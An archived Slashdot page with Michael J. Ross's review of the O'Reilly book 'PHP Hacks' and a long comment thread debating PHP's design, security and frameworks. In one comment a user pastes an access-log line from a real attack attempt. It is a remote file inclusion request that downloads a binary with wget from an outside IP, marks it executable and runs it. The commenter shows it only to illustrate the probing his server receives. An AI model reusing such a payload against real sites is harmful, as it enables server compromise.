Stories
Slash Boxes
Comments

News for nerds, stuff that matters

PHP Hacks

Posted by samzenpus on Wed Jul 05, 2006 04:08 PM
from the tricks-of-the-trade dept.
Michael J. Ross writes "Given the current popularity of the Web development language PHP, it makes sense that newcomers to the language have a large number of introductory and reference volumes from which to choose. But for the more advanced PHP programmer, there are far fewer titles that explain how to make the most of the language, by applying it to solve relatively substantial problems. One such book is PHP Hacks: Tips & Tools for Creating Dynamic Websites, by Jack D. Herrington. Read the rest of Michael's review.
PHP Hacks
author Jack D. Herrington
pages 468
publisher O'Reilly Media
rating 8
reviewer Michael J. Ross
ISBN 0596101392
summary Practical techniques and source code for improving PHP-based Web sites and applications.


The book was published by O'Reilly Media in December of 2005. Despite its title, PHP Hacks: Tips & Tools for Creating Dynamic Websites is clearly intended to show how PHP's capabilities can be extended beyond its most common usage for creating dynamic and database-driven Web pages, and can be employed in such areas as graphics, reporting, Web site testing, code generation, and even fun purposes (for those few programmers who find the former topics less than entertaining). The author, assisted by six contributors listed in the Credits section, manages to pack an impressive number of general programming ideas and PHP-specific topics within this title's 468 pages. The material is grouped into 10 chapters, each of which contains a generous number of "hacks," each in its own section.

As with most if not all of the other titles published by O'Reilly, this book has a Web page that offers an overview of the book, its table of contents, all of the book's code (in both Zip and tar file format), and a list of confirmed and unconfirmed errata. In addition, the site hosts five sample hacks (in PDF format): accessing iPhoto pictures, generating Excel spreadsheets, avoiding the "double submit" problem, reading RSS feeds on your PSP, and creating custom Google Maps. Perusing these hacks would give the prospective buyer a clear sense as to the style of the book's other 95 hacks, as well as the (low) level of PHP expertise needed to understand them.

The book begins with a preface that describes the organization, conventions, and icons chosen for the book. Also, it covers the legality of the code samples, lists contact information, and mentions O'Reilly's Safari online book service, which contains this title among many other PHP resources. What is perhaps most unique about this book's preface is that the author identifies over half a dozen weaknesses commonly seen in PHP applications, and explains how his book addresses those problems. In addition, he makes explicit how some of the hacks can be used for jazzing up one's Web site or Web-based application.

The first chapter discusses how to install PHP on Windows, Mac OS X, and Linux, and then verify that the installation was done properly. Herrington then briefly explains how to install MySQL and perform some basic database management. The chapter concludes with coverage of installing the PEAR library on your local machine and on your Web host's server (which is incorrectly identified as your "ISP machine," apparently assuming that most developers choose their Internet service providers for hosting their sites, when in fact the opposite is true). Since the typical reader of a non-beginning book such as this no doubt has one or more introductory and/or reference PHP books at hand, it would seem superfluous to waste time and space explaining how to install these components. But few pages are taken up by the material.

The next chapter is devoted to hacks that help to jazz up the design of one's Web sites, including how to create a skinnable interface, build a breadcrumb trail, create HTML boxes, add tabs to your interface, and other valuable techniques. Subsequent chapters offer hacks in the areas of dynamic HTML (DHTML), graphics and digital pictures, databases and XML, application and e-commerce design, patterns and PHP object orientation, testing and documentation generation, and building alternative user interfaces. The 10th and final chapter covers some "fun stuff," such as creating dynamic playlists, developing a media upload/download center, and even putting Wikipedia on a Sony PlayStation Portable.

Rather than try to explain in detail all of the many topics covered in the book, I instead encourage the interested reader to visit the publisher's Web page, and scan through the table of contents provided, to get a better idea as to how much of the book would be of interest to the individual. Also, the five sample hacks listed on the site, would be well worth examining and trying out. Overall, the topics chosen reflect favorably upon the judgment of the lead author and the other contributors to the book. The typical PHP veteran would likely be interested in most of the applications covered, and would probably learn some new tricks, especially in the areas of patterns and code testing, regardless of their level of experience.

Like all books, this one is not perfect. As with the first printing of most technical books; particularly those chock-full of source code; the book contains a fair number of errata, likely even greater in number than those reported and listed on the publisher's Web site, as mentioned earlier. Consequently, any reader who chooses to test the sample code and he or she would be encouraged to do so; should keep one browser window or editor buffer open and devoted to those errata, so as to minimize the time spent trying to figure out why some sample code is not working as advertised.

Some readers posting in forums have complained that the sample code has evidently not been fully tested on all platforms, nor in all Web browsers. Since few if any reviewers would have the time, resources, or inclination to verify these claims, it should suffice to simply bear in mind that the script output and other behavior detailed in the book might not exactly match those experienced during one's own usage of the code.

The fact that there were several cooks in the kitchen brewing up this particular book, is obvious from the way that the code formatting is not consistent throughout the book, as well as the variety of problem-solving styles. Fortunately, neither weakness is of much consequence, and the latter might even be considered a "feature," as it allows the reader to see how a number of veteran PHP developers approach solving a problem.

Most technical works written by a team of authors, end up as excessive "doorstops" that are often frustrating to read as a result of the wildly inconsistent writing and coding styles, to say nothing of the material often being out of date as a result of the long production time needed by the publisher. The opposite case can be even worse, when a publisher releases a book that was clearly thrown together as quickly as possible to capitalize upon a hot new trend in technology. Thankfully, PHP Hacks keeps the style differences to a minimum, and benefits from having a lead author responsible for the book as a whole.

Some programming purists may take issue with the use of the term "hack" used as a synonym for a small PHP application or the use of such for solving a problem, since the majority of the PHP scripts in the book do not involve any programming or problem-solving that would be considered notably clever or elegant. Yet the misuse of the term seems to be spreading, and is not limited to this particular book ; another example of marketing overpowering stability of language. In the preface of PHP Hacks, the author explains that he uses the term in the positive sense of creative participation, to help reclaim it from its popular usage in place of the more traditional term "cracking," i.e., breaking into systems.

Yet aside from these complaints, PHP Hacks is a worthy title that offers explanations and source code for many valuable site-enhancing applications, testing and code generation techniques, and critical e-commerce safeguards. I recommend this book to any PHP developer who would like to add to their Web sites' capabilities, as well as their knowledge of what PHP can do.

Michael J. Ross is a freelance writer, computer consultant, and the editor of the free newsletter of PristinePlanet.com."


You can purchase PHP Hacks: Tips & Tools for Creating Dynamic Websites from bn.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.
This discussion has been archived. No new comments can be posted.
Display Options Threshold:
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
  • You got that right (Score:3, Funny)

    by Anonymous Coward on Wednesday July 05 2006, @04:13PM (#15663001)
    PHP is a bunch of hacks.
    • Re:You got that right by Anonymous Coward (Score:1) Wednesday July 05 2006, @05:37PM
      • Re:You got that right (Score:4, Insightful)

        by PCM2 (4486) on Wednesday July 05 2006, @05:47PM (#15663530)
        (http://neilmcallister.com/)
        PHP has a lot of functions and although some people critisize this, it makes it much easier to accomplish many different tasks.

        In my experience, it's not so much a case of an embarrassment of riches but more like what the parent said -- it feels like a bunch of hacks. For example, standard library functions that seem similar in almost every respect, save that they work on different data types, take different parameters (or accept them in a different order). This can be very frustrating for experienced programmers who want to get up to speed quickly. Presumably it's less of a worry if you're just learning on PHP.

        I don't hate PHP. I don't really like it, either, though. I'm one of those people who is quick with a snide comment about it whenever it's brought up, just because it has always feels so amateurish, poorly designed, and slapdash to me. That said, you can do some pretty decent stuff given a database abstraction layer and Smarty templates (for example). And the one big advantage it has over Ruby on Rails is that it's available on just about every cheapie $5/month Web host around, whereas RoR is barely supported.

        [ Parent ]
      • Re:You got that right (Score:4, Informative)

        by VGPowerlord (621254) on Wednesday July 05 2006, @06:26PM (#15663698)
        (http://powerlord.livejournal.com/)

        I don't see why everyone is so critical of PHP.

        PHP started out as a set of Perl scripts in 1995, presumably using the then-new Perl 5. When it became its own language in 1997, it somehow lost namespaces, the module loading system, DBI, use strict, and everything else in Perl that doesn't register on the suck-o-meter. It also did silly things like adopt the TCL global variable system, rather than using the one that C, Perl, Java, and even things like VB use.

        So, yeah, there's a reason every is critical of PHP.

        Sources: perldoc perlhist [cpan.org] (perl 5.000 was released on 1994-Oct-17), PHP History [php.net] (PHP/FI 1.0 was a bunch of Perl scripts released in 1995, PHP/FI 2.0 was written in C in 1997), DBI::Changes [cpan.org] (First official DBI release was 0.58 released in 21 June 1995)

        [ Parent ]
        • Re:You got that right by ednopantz (Score:2) Wednesday July 05 2006, @09:24PM
        • Re:You got that right (Score:4, Insightful)

          by mcrbids (148650) on Thursday July 06 2006, @02:23AM (#15665405)
          So, yeah, there's a reason every is critical of PHP.

          I'm on the other side. What is it about a language that makes it *EASY* to consider the problem at hand, and doesn't make you worry too much about implementation details?

          Using PHP, you don't have to worry about things like memory management and/or memory type translation. A "1" becomes a 2 when you add a 1 to it.

          Arrays and hashes are the same. Any array can be accessed as a hash, any hash is also an array. Makes it easy to define data in memory, then do loops/recursion on it to get whatever result you want.

          Simple!

          Time spent solving customer problems rather than implementation problems is time spent making money instead of wasting it.

          I've written some really big projects with PHP. (EG: over 50,000 lines in 3+ years, with NO HTML CODE) It's done a magnificent job. It scales nicely and easily with it's "share nothing" approach [zefhemel.com], and is highly reliable. In the 6 years that I've been actively developing with PHP, the number of times that there was a bug/problem with the language I could count on one hand, with 4 of the fingers peeled down. It's reliable and scalable enough that Yahoo uses it as their preferred development language. [com.com]

          And, as far as security, the vast majority of issues have been with idiots writing insecure scripting, which can be done in any language. (Yes, I'm thinking of you, SPAW editor!) And, if you're using a decent operating system [centos.org] with an update mechanism (EG: yum) then updates to fix found security issues is a no-brainer.

          With PHP-GTK you can write quick, powerful, cross-platform GUI applications with ease and speed [php.net] - I've done so, managing a distributed database application among some 70 school districts with many hundreds of users - and it works marvelously.

          PHP may have it's warts, but it's a damned fine tool. Don't let anyone convince you otherwise.
          [ Parent ]
      • Re:You got that right by Jerf (Score:2) Wednesday July 05 2006, @10:35PM
      • 1 reply beneath your current threshold.
    • Re:You got that right by azzurri (Score:1) Thursday July 06 2006, @09:00AM
    • Re:You got that right by jo42 (Score:2) Thursday July 06 2006, @01:20PM
    • Re:Read the title real quick.... by no_barcode (Score:2) Wednesday July 05 2006, @06:31PM
    • 2 replies beneath your current threshold.
  • I Read "PHP Hacks"... (Score:2, Funny)

    by guitaristx (791223) on Wednesday July 05 2006, @04:17PM (#15663022)
    (Last Journal: Friday June 10 2005, @04:46PM)
    ...as those persons whose technical acuities are slightly greater than "Script Kiddies". Maybe I just hate PHP.
    • You do (Score:5, Insightful)

      by Unski (821437) on Wednesday July 05 2006, @04:31PM (#15663112)
      (Last Journal: Sunday May 21 2006, @05:16PM)
      it's just the fashion at the moment. Bashing Java is a classic, but PHP, like 80's ra-ra skirts and lip gloss, goes in and out of fashion constantly. Just stick to praising R-o-R, that'll keep the karma nice n' safe.
      [ Parent ]
      • Re:You do (Score:5, Insightful)

        by Fnkmaster (89084) on Wednesday July 05 2006, @05:43PM (#15663512)
        It sends shivers of disgust down the spine of every serious developer.

        Unlike Perl?!?! Perl is just a foul, disgusting-looking beast. While the PHP libraries may be a touch on the fragile and "arbitrary" side, compared to the libraries in Java, for example, the language itself is like Miss America to Perl's Roseanne Barr.

        The "serious developers" who used to write web apps in Perl and TCL, when those were the two most popular choices for such things back in the day, generally produced write-only web monstrosities that could never be picked up or figured out by anybody else, "serious developer" or not.

        PHP is relatively fast, simple, syntactically straightforward, and easy to work with. This makes it a good choice for a variety of web applications, though obviously not always the best choice. For some of us, getting the job done is more important than feeling like an elite hax0r.
        [ Parent ]
        • Re:You do by WilliamSChips (Score:2) Wednesday July 05 2006, @08:04PM
          • 1 reply beneath your current threshold.
        • Re:You do by PhrostyMcByte (Score:1) Wednesday July 05 2006, @09:32PM
          • Re:You do (Score:5, Insightful)

            by Tablizer (95088) on Wednesday July 05 2006, @09:53PM (#15664539)
            (http://www.geocities.com/tablizer | Last Journal: Saturday March 15 2003, @01:22PM)
            how immature of a language PHP is. PHP is good for simple pages, but other sites should seriously move to something else until the framework matures a lot.

            I would like to see concrete examples of other languages being "better". The skill of the programmer matters far more than the language in my experience, and PHP gives you enough options to make good code *if* you want to.

            The spaghetti code that PHP seems to encourage in a lot of people

            This is because PHP is "approachable". It does not differ enough from C and JavaScript to scare people away, unlike other languages. The "elitist" languages are not necessarily better, they just scare away amatures and newbies so that you don't have as many amatures and newbies writing messy code. Perhaps this is a good thing, perhaps it means that the elitist language is doomed to obscurity. If PHP can make both crowds fairly happy, it will have lasting power. I've never met a language that makes everybody happy, but if diverse sides each give PHP a B-minus, that is doing about as well as you can as far as diversity.
                   
            [ Parent ]
            • Re:You do by Senjaz (Score:2) Thursday July 06 2006, @03:59AM
              • Re:You do by Mattintosh (Score:3) Thursday July 06 2006, @06:15AM
                • Re:You do by Senjaz (Score:3) Thursday July 06 2006, @07:11AM
              • Re:You do by Tablizer (Score:1) Thursday July 06 2006, @11:10PM
                • Re:You do by Senjaz (Score:2) Friday July 07 2006, @02:41AM
            • Re:You do by Tony-A (Score:2) Thursday July 06 2006, @10:46PM
      • Re:You do by Bastard of Subhumani (Score:1) Thursday July 06 2006, @09:41AM
      • 1 reply beneath your current threshold.
    • Re:I Read "PHP Hacks"... by Concerned Onlooker (Score:3) Wednesday July 05 2006, @10:13PM
  • can you clarify that? (Score:5, Funny)

    by mcmonkey (96054) on Wednesday July 05 2006, @04:19PM (#15663036)
    (http://www.evolt.org/)
    Also, it covers the legality of the code samples...

    And....? I presume if all the code samples were legal, such a statement would be unnecessary. I further presume such a statement to that effect would not warrant inclusion in a book review.

    So just what is the aspect of the legality of the code samples in need of clarification? Is one of the 'hacks' phishing with PHP? Adding free copies to your Kinkos card? Downloading launch codes from the WOPR? They're using the PHP to cook up meth, aren't they? *peer*

  • Can't let this go (Score:1, Offtopic)

    In the preface of PHP Hacks, the author explains that he uses the term in the positive sense of creative participation, to help reclaim it from its popular usage in place of the more traditional term "cracking," i.e., breaking into systems.

    I hate historical revisionism like this. The traditional word for breaking into systems is HACKING, because breaking into systems was considering "clever", along with other clever usages of computers. Some busybodies decided that it gave hackers a bad name, and thus "cracking" was coined. The word is an abomination and I, for one, refuse to use it.

  • Hacks? (Score:3, Insightful)

    by mikeal (968191) on Wednesday July 05 2006, @04:24PM (#15663070)
    What defines a "hack" these days.

    Maybe I'm a bit bitter, and even at the risk of sounding like a troll I'm just gonna say it, isn't writing ANY decent amount of php kind of a hack.

    Personally I'm a django fan, I really respect the rails kids for what they are doing too. Once you start doing web development in a real dynamic language you realize that web development in php in most cases IS a hack.

    I've written lots of php over the years, and I'm so glad to know that I NEVER HAVE TO DO IT AGAIN. Unlike in other languages the "hacks" in php tend to be a necessity for doing development in the language. I've really tried to write "clean" code in php and it's just not possible for any project of a decent size.

    Any disagreements?
    • Re:Hacks? by nuzak (Score:2) Wednesday July 05 2006, @04:29PM
    • Re:Hacks? by gamlidek (Score:3) Wednesday July 05 2006, @04:32PM
      • Re:Hacks? by mikeal (Score:2) Wednesday July 05 2006, @04:42PM
      • Re:Hacks? (Score:4, Interesting)

        Trustudio's PHP IDE is ok, but way behind the competition and hardly a finished product (their charging licensing for a beta version!).

        On the other hand I've been using NuSphere's PHPed and Zend's own ZendStudio for quite a while now, they both support remote debugging, the latest version of PHP, version control and code profiling and are both much more advanced and stable compared to Trustudio.

        PHP is no longer a baby language, and although it really annoys me sometimes (hello! no multiple inheritance or large integer/floating point number support) big real world applications are being written in it and most times I consider it much cleaner than Java when you know what you're doing.

        It's the age old thing, if you make it easier for good programmers to program, they'll get working code out of the door with much less bugs compared to a stricter language. It's quick and at times dirty, but it's understandable, you can apply [insert buzzword here] with little to no effort and it runs on most of the world's web hosting servers.

        For example, move from C to C++ and you will almost certainly be more productive, from C to D, from C++ to Java, from Bash to TCL, from Java to PHP.. you get the picture. When I've got a tight deadline and lots of features to implement, I'm going to want to do it in whichever language is most productive, this is why you see people adding backend JavaScript/BSH support to their J2EE webapps *laugh*.
        [ Parent ]
        • Re:Hacks? by hmartin222 (Score:1) Thursday July 06 2006, @02:29PM
    • Re:Hacks? by Anonymous Coward (Score:1) Wednesday July 05 2006, @04:41PM
    • Re:Hacks? by ScottLindner (Score:2) Wednesday July 05 2006, @04:52PM
    • Re:Hacks? by scwizard (Score:1) Wednesday July 05 2006, @05:25PM
      • Re:Hacks? by protohiro1 (Score:2) Wednesday July 05 2006, @06:01PM
        • Re:Hacks? by scwizard (Score:1) Thursday July 06 2006, @10:22AM
      • Re:Hacks? by Grimboy (Score:1) Wednesday July 05 2006, @06:06PM
    • Re:Hacks? by Grimboy (Score:1) Wednesday July 05 2006, @05:32PM
      • Re:Hacks? by mikeal (Score:1) Wednesday July 05 2006, @05:42PM
    • 2 replies beneath your current threshold.
  • 1. Install Drupal.

    OK, I'm good to go!
  • From the title... (Score:2, Interesting)

    by Anonymous Crowhead (577505) on Wednesday July 05 2006, @04:35PM (#15663148)
    I thought maybe it would explain the constant hack attempts on non-existent php apps on my webservers.

    [admin@bsever logs]$ tail -100000 access_log |grep php -i |wc -l
          2128

    2% of last 100K hits. I run no php on it + this is a test server that is not linked to anywhere public.

    For example:

    65.110.43.170 - - [04/Jul/2006:00:37:03 -0700] "GET /articles/mambo/index2.php?_REQUEST[option]=com_co ntent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolu te_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tm p;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon ;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    • Re:From the title... by Nos. (Score:3) Wednesday July 05 2006, @04:42PM
      • Re:From the title... by richdun (Score:2) Wednesday July 05 2006, @05:03PM
      • Re:From the title... by telbij (Score:2) Wednesday July 05 2006, @05:05PM
      • Re:From the title... by dedazo (Score:2) Wednesday July 05 2006, @05:19PM
      • Re:From the title... by FooAtWFU (Score:3) Wednesday July 05 2006, @05:39PM
        • Re:From the title... by drspliff (Score:2) Wednesday July 05 2006, @09:38PM
        • Re:From the title... (Score:5, Insightful)

          by lbft (950835) on Wednesday July 05 2006, @09:45PM (#15664507)
          (http://shock-horror.com/)
          Database work? Sorry, no prepared statements.

          PHP has had prepared statement support for MySQL since 2003, it's been emulated in PEAR for an eternity and the very useful PDO extension provides an abstracted interface supporting prepared statements to SQL Server, Sybase, Firebird, Informix, MySQL, Oracle, PostgreSQL, SQLite, DB2 and ODBC.

          (and of course, you HAVE to use the shell.)

          Forgive me, but you don't know what you're talking about. There is almost never a need to call external apps from a PHP script. The most common needed external app is ImageMagick (because sometimes GD doesn't provide all the functionality you need.) Even then, there are at least two PHP extensions to deal with ImageMagick directly, as well as a PEAR package to abstract away from the image processing library/app.

          Quick check: do you want escapeshellcmd, or escapeshellarg?

          Well, I dunno, do you want to escape an entire command so that multiple commands can't be injected or do you want to escape a single argument so that multiple arguments can't be injected? Heaven forbid that you should have to spend ten seconds checking the manual [php.net] pages [php.net]...

          Going to send mail()?

          So use one of the multitude of classes specifically written to encapsulate mail sending (including, shock horror, one in PEAR.)

          two words should make your skin crawl: "register globals"

          register_globals has been disabled by default for six (6) years.

          It's not the fault of the language that you didn't bother to keep up with how to use it as it evolved.

          [ Parent ]
        • Worse language than PHP for security? by patio11 (Score:3) Wednesday July 05 2006, @11:25PM
    • Re:From the title... by Photon Ghoul (Score:2) Wednesday July 05 2006, @05:03PM
    • Re:From the title... by rp (Score:1) Thursday July 06 2006, @05:24PM
  • Advanced PHP programmer? (Score:3, Funny)

    by bsartist (550317) on Wednesday July 05 2006, @04:46PM (#15663225)
    (http://wv-www.net/)
    "Advanced PHP programmer"? Now there's a contradition for you.
  • I'm not a php/perl guru, but (Score:5, Interesting)

    by ardor (673957) on Wednesday July 05 2006, @04:46PM (#15663230)
    anyone can tell me if this is to be taken seriously, or rather seen as worthless php-bashing?
    http://tnx.nl/php [tnx.nl]
  • RoR for PHP Projects (Score:2, Interesting)

    by Space_Nerd (255762) on Wednesday July 05 2006, @05:34PM (#15663469)
    Has anyone tried the CakePHP package? It's supposed to be similar to RoR, but i'm unable to deploy a Ruby based solution at work due to stupid policys (like: everybody knows php, nobody knows ruby... pfff). If not, are there any rails-like project for PHP anyone care to recommend?

    Thanks!
  • Despite what? (Score:2, Insightful)

    by JudgeDredd (561957) on Wednesday July 05 2006, @05:44PM (#15663518)
    The book was published by O'Reilly Media in December of 2005. Despite its title, PHP Hacks: Tips & Tools for Creating Dynamic Websites

    Umm, despite its title, what?
  • PHP Popularity (Score:2, Informative)

    by hotfireball (948064) on Wednesday July 05 2006, @05:54PM (#15663557)
    "Everything populair is wrong" -- Oscar Wilde
  • blame the coder, not the language (Score:3, Insightful)

    by Anonymous Coward on Wednesday July 05 2006, @06:07PM (#15663615)
    Yes, PHP is relatively easy to begin coding in, what with its fairly forgiving variable typing (or what some would call non-typing) and its babysitting of memory. I would even agree that PHP tends to attract more bozos and wannabes for this very reason. However, PHP is, and continues to be the most widely used non M$ language for open sourced web applications. This is because it works. Sure, PHP allows sloppy coding, but it also allows clean and well written code. PHP is a lightweight, nimble, comprehendable scripting language that is very well suited for its intended environment: the web.

    -Peter
  • Free PHP bashing (Score:4, Insightful)

    by Beuno (740018) <argentina&gmail,com> on Wednesday July 05 2006, @07:29PM (#15663930)
    (http://www.beuno.com.ar/)
    I understand that PHP has a very solid newbie user base, but let's not forget monstrous sites like Digg and Wikipedia run on PHP + MySQL
  • Uhhhh (Score:2, Insightful)

    by Anonymous Coward on Wednesday July 05 2006, @08:17PM (#15664152)
    Did any of you failed PHP programmers ever think maybe its your own ability to write well formed code?

    Since many of the largest and most complicated sites in the world use PHP flawlessly, I think its just your amateurish programming style requiring a compiler to bitch slap you till you do the right thing. That's like blaming the razor blade company when you finally relive us PHP programmers from having to listen to your bitching by committing suicide. Just because you have the freedom, doesnt mean you shouldn't exercise self control.

    Incidentally, if you use PHP for a few months you will find the names to functions coming pretty automatically. You could also grab a copy of an IDE like Zend Studio which shows a list of possible function endings, descriptions and a param summary (even for user defined functions, respecting namespace and supporting classes).
  • Most posts offtopic (Score:4, Funny)

    by linvir (970218) * on Wednesday July 05 2006, @09:26PM (#15664424)

    PHP seems to be one of those red-button topics on Slashdot. If the word even appears in the text of the story, the topic at hand is dropped entirely in favour of having a big wanking session [linuxvirus.net] and patting each other on the back for knowing a 'superior' language, or for having been into Linux 'before it was cool', or whatever the general topic happens to be.

    And not only is this stuff offtopic, it's also just so painfully redundant. I swear, that Slashdot story generator page [bbspot.com] from a while back was pretty impressive, but I'm starting to think maybe I could cook up a Slashdot comment generator as an add-on.

    // Wooooooooo! Watch out for magic quotes!
    if(get_magic_quotes_gpc())
    {
    echo 'FUK U U FUKKEN DIKKED WEBHOST I AIN RUNNEN NO FUKKEN SITE WIV NO FUKKEN MAGIC QUOTES' . "\n";
    exit;
    }

    // And now for a basic example of some comment generation
    if (strpos($story, 'DRM'))
    {
    echo 'DRM is bad.' . "\n";
    while (strrpos(date('l'), 'y') === 0) // what a FUKKEN MESS111
    {
    echo 'Yes, DRM is very, very bad indeed.' . "\n";
    }
    }
  • What a coincidence (Score:2, Insightful)

    by petroele (81470) on Thursday July 06 2006, @10:13AM (#15667189)
    (http://www.ericscc.com/)
    I just bought this book last week. I'm mainly a C++/Java guy but I've been doing lots of PHP over the last year or so. To stay on topic, I was fairly happy with the content of the book. Probably about half of it was stuff I already knew or stuff that was useful but really not PHP specific (DHTML, Javascript, OO design patterns). But there were also quite a few useful hacks that made it worthwhile. Overall, it is good book for thumbing through in your spare time to pick up some new tricks.
  • I don't know, PHP may have its faults, but I enjoy working with it:

    http://wsframework.sf.net/ [sf.net]
  • Yet again Slashdot links to BN.com for kickbacks when Amazon has it cheaper.

    And Bookpool ** [bookpool.com] has it for virtually the same price as Amazon.

    ** This is a non-affiliate link.

    [ Parent ]
  • by VP (32928) on Wednesday July 05 2006, @05:17PM (#15663374)
    Slashdot provides a place for reviews of technical books. They get to specify the URL and get referrer credit for it. The reson it is BN is because of the Amazon "One-click" patent, for which they sued BN - so using Barnes and Nobble both supports Slashdot, and provides a small way to fight obvious SW patents...

    On the other hand, looks like the parent put their own referrer link to Amazon - now that's what I call cheating!
    [ Parent ]
  • Re:Code Igniter (Score:1)

    by linuxbz (875073) on Wednesday July 12 2006, @02:12PM (#15707452)
    (http://linux.bz/)
    I'll second that. CodeIgniter http://codeigniter.com/ [codeigniter.com] is less than 6 months old, but done by the ExpressionEngine folks, and is a really good PHP framework. I discovered it while looking for a way to make Rails work ;-)
    [ Parent ]
  • 8 replies beneath your current threshold.